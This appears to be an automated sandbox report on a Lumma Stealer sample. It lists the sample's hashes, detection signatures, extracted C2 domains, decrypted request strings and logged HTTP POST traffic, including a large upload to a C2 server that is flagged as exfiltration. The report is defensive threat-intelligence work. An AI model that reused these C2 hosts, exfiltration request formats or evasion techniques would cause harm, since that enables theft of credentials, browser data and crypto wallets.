

Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1544564
MD5: e8febbee7f62ca4c85f34bccb279eb67
SHA1: 610b9007b886130f73e723daf0fc8222ee66a396
SHA256: 7b054538e0120d88a52303efa5128a62c629ded45f5fafeadf93b9f284d1a70a
Tags: exe, user-Bitsight

Detection

Family: LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 7636 cmdline: "C:\Users\user\Desktop\file.exe" MD5: E8FEBBEE7F62CA4C85F34BCCB279EB67)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["fadehairucw.store", "crisiwarny.store", "presticitpo.store", "navygenerayk.store", "necklacedmny.store", "thumbystriw.store", "founpiuer.store", "scriptyprefej.store"], "Build id": "4SD0y4--legendaryy"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
00000000.00000003.1878781557.0000000001487000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.1879407233.0000000001487000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.1862847814.0000000001487000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.1895389301.0000000001487000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: file.exe PID: 7636 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
(3 further Yara entries not shown)

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-29T15:27:15.847011+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.7 | 49704 | 188.114.96.3 | 443 | TCP
2024-10-29T15:27:18.068779+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.7 | 49715 | 188.114.96.3 | 443 | TCP
2024-10-29T15:27:15.847011+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.7 | 49704 | 188.114.96.3 | 443 | TCP
2024-10-29T15:27:18.068779+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.7 | 49715 | 188.114.96.3 | 443 | TCP
2024-10-29T15:28:14.202045+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49979 | 188.114.96.3 | 443 | TCP

AV Detection

Source: file.exe | Avira: detected
Source: file.exe.7636.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["fadehairucw.store", "crisiwarny.store", "presticitpo.store", "navygenerayk.store", "necklacedmny.store", "thumbystriw.store", "founpiuer.store", "scriptyprefej.store"], "Build id": "4SD0y4--legendaryy"}
Source: file.exe | ReversingLabs: Detection: 42%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: 00000000.00000002.2349702122.0000000000FD1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: scriptyprefej.store
Source: 00000000.00000002.2349702122.0000000000FD1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: navygenerayk.store
Source: 00000000.00000002.2349702122.0000000000FD1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: founpiuer.store
Source: 00000000.00000002.2349702122.0000000000FD1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: necklacedmny.store
Source: 00000000.00000002.2349702122.0000000000FD1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: thumbystriw.store
Source: 00000000.00000002.2349702122.0000000000FD1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: fadehairucw.store
Source: 00000000.00000002.2349702122.0000000000FD1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: crisiwarny.store
Source: 00000000.00000002.2349702122.0000000000FD1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: presticitpo.store
Source: 00000000.00000002.2349702122.0000000000FD1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: presticitpo.store
Source: 00000000.00000002.2349702122.0000000000FD1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.2349702122.0000000000FD1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.2349702122.0000000000FD1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000002.2349702122.0000000000FD1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.2349702122.0000000000FD1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: Workgroup: -
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49715 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49721 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49970 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49977 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49979 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49980 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49981 version: TLS 1.2

Networking

Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49715 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49715 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49704 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49704 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49979 -> 188.114.96.3:443
Source: Malware configuration extractor | URLs: fadehairucw.store
Source: Malware configuration extractor | URLs: crisiwarny.store
Source: Malware configuration extractor | URLs: presticitpo.store
Source: Malware configuration extractor | URLs: navygenerayk.store
Source: Malware configuration extractor | URLs: necklacedmny.store
Source: Malware configuration extractor | URLs: thumbystriw.store
Source: Malware configuration extractor | URLs: founpiuer.store
Source: Malware configuration extractor | URLs: scriptyprefej.store
Source: Joe Sandbox View | IP Address: 188.114.96.3
Source: Joe Sandbox View | IP Address: 188.114.96.3
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: necklacedmny.store
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 52
    Host: necklacedmny.store
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 12849
    Host: necklacedmny.store
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 15081
    Host: necklacedmny.store
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 20406
    Host: necklacedmny.store
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 1213
    Host: necklacedmny.store
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 550975
    Host: necklacedmny.store
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: presticitpo.store
Source: global traffic | DNS traffic detected: DNS query: crisiwarny.store
Source: global traffic | DNS traffic detected: DNS query: fadehairucw.store
Source: global traffic | DNS traffic detected: DNS query: thumbystriw.store
Source: global traffic | DNS traffic detected: DNS query: necklacedmny.store
Source: unknown | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: necklacedmny.store
Source: file.exe, 00000000.00000003.1879030685.0000000005D6D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: file.exe, 00000000.00000003.1879030685.0000000005D6D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: file.exe, 00000000.00000003.1950914872.0000000001487000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2340779030.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1878781557.0000000001487000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1862847814.0000000001487000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1879407233.0000000001487000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1895389301.0000000001487000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2340350383.00000000014C1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microX
Source: file.exe, 00000000.00000003.1879030685.0000000005D6D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: file.exe, 00000000.00000003.1879030685.0000000005D6D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000000.00000003.1879030685.0000000005D6D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000000.00000003.1879030685.0000000005D6D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: file.exe, 00000000.00000003.1879030685.0000000005D6D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: file.exe, 00000000.00000003.1879030685.0000000005D6D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000003.1879030685.0000000005D6D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: file.exe, 00000000.00000003.1879030685.0000000005D6D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: file.exe, 00000000.00000003.1879030685.0000000005D6D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: file.exe, 00000000.00000003.1385163124.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000003.1894747831.0000000005C7B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1895063394.0000000005C7F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
Source: file.exe, 00000000.00000003.1894747831.0000000005C7B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1895063394.0000000005C7F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
Source: file.exe, 00000000.00000003.1385163124.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.1385163124.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.1385163124.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000003.1894747831.0000000005C7B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1895063394.0000000005C7F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: file.exe, 00000000.00000003.1894747831.0000000005C7B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1895063394.0000000005C7F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000003.1385163124.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.1385163124.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.1385163124.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe, 00000000.00000003.1895063394.0000000005C7F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
Source: file.exe, 00000000.00000003.1897569815.00000000014E4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1897711414.00000000014E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1878781557.0000000001487000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1879407233.0000000001487000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1895389301.0000000001487000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.sto
Source: file.exe, 00000000.00000003.1950914872.00000000014D8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store/
Source: file.exe, 00000000.00000003.1384736970.00000000014D4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store/C
Source: file.exe, 00000000.00000003.1384736970.00000000014D4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store/K
Source: file.exe, 00000000.00000003.1879407233.0000000001487000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1895389301.0000000001487000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2340350383.00000000014C1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store/api
Source: file.exe, 00000000.00000003.1897569815.00000000014E4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1897711414.00000000014E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1895389301.0000000001487000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store/api7U
Source: file.exe, 00000000.00000003.1878781557.0000000001487000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1879407233.0000000001487000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store/apis9
Source: file.exe, 00000000.00000003.1895389301.0000000001487000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store/apis?
Source: file.exe, 00000000.00000003.2341515755.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2351913057.00000000014A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2341482774.00000000014AA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2349342811.00000000014A6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store/apix
Source: file.exe, 00000000.00000003.2340513943.00000000014DB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store/hd
Source: file.exe, 00000000.00000003.1384736970.00000000014D4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store/k
Source: file.exe, 00000000.00000003.1878781557.0000000001487000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1879407233.0000000001487000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store/p
Source: file.exe, 00000000.00000003.1862847814.0000000001487000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store/qP
Source: file.exe, file.exe, 00000000.00000003.1862847814.0000000001469000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store:443/api
Source: file.exe, 00000000.00000003.2348526012.000000000145F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1878781557.0000000001469000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store:443/apil
Source: file.exe, 00000000.00000003.1880747839.0000000005F85000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: file.exe, 00000000.00000003.1880747839.0000000005F85000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: file.exe, 00000000.00000003.1894747831.0000000005C7B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1895063394.0000000005C7F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
Source: file.exe, 00000000.00000003.1385163124.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.1385163124.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: file.exe, 00000000.00000003.1894747831.0000000005C7B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1895063394.0000000005C7F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: file.exe, 00000000.00000003.1880747839.0000000005F85000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
Source: file.exe, 00000000.00000003.1880747839.0000000005F85000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
Source: file.exe, 00000000.00000003.1880747839.0000000005F85000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
Source: file.exe, 00000000.00000003.1880747839.0000000005F85000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.1880747839.0000000005F85000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown | Network traffic detected: HTTP traffic on port 49970 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49970
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49981 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49977 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49979 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49715 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49721 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49970 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49977 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49979 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49980 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49981 version: TLS 1.2

              System Summary

              barindex
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .rsrc
              Source: file.exeStatic PE information: section name: .idata
              Source: C:\Users\user\Desktop\file.exeProcess Stats: CPU usage > 49%
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014974490_3_01497449
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014974490_3_01497449
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014A37F40_3_014A37F4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014A37F40_3_014A37F4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014DED610_3_014DED61
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014DEDF10_3_014DEDF1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014974490_3_01497449
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014974490_3_01497449
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014AB84F0_3_014AB84F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014A37F40_3_014A37F4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014A37F40_3_014A37F4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014DED610_3_014DED61
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014DEDF10_3_014DEDF1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014974490_3_01497449
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014974490_3_01497449
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014A37F40_3_014A37F4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014A37F40_3_014A37F4
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: ZLIB complexity 0.9978448275862069
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@5/1
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe, 00000000.00000003.1863317747.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1863683992.0000000005C66000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1385017883.0000000005C96000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1385242528.0000000005C78000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe | ReversingLabs: Detection: 42%
Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: webio.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
